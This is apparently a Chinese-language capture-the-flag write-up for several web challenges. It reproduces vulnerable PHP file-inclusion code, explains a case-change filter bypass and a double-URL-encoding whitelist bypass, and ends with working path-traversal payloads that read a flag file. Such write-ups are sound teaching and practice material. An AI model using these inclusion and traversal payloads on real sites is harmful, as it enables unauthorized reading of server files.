Web_php_include
过滤了php://
,后面有include文件包含,这种过滤不是正则过滤,可以通过大小写绕过
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
由于不知道flag在哪个文件里面,所以先搞到目录
得到flag
surpersqli
2019强网杯的随便注,写过就不再写wp了
ics-06
抓包爆破
warmup
代码审计
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
参数page被处理,会截断?前的字符串
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
有url解码
$_page = urldecode($page);
在hint.php里面看到flag在ffffllllaaaagggg里面,现在就是想办法让include包含到这个文件
显然前三个if条件跟苛刻,所以选择最后一个,经过了url解码,这样我们就可以url编码两次,让服务器收取时解码一次,再类里面再解码一次,就刚刚好了,这样就可以让这个类返回true了
payload:?file=hint.php%253fffffllllaaaagggg
果然滑稽消失了,但是flag没有出来,就一层一层往上访问就行了,有个小细节,ffffllllaaaagggg每个字母有四次,可以猜测再往上爬四层就行
payload:source.php?file=hint.php%253f../../../../../ffffllllaaaagggg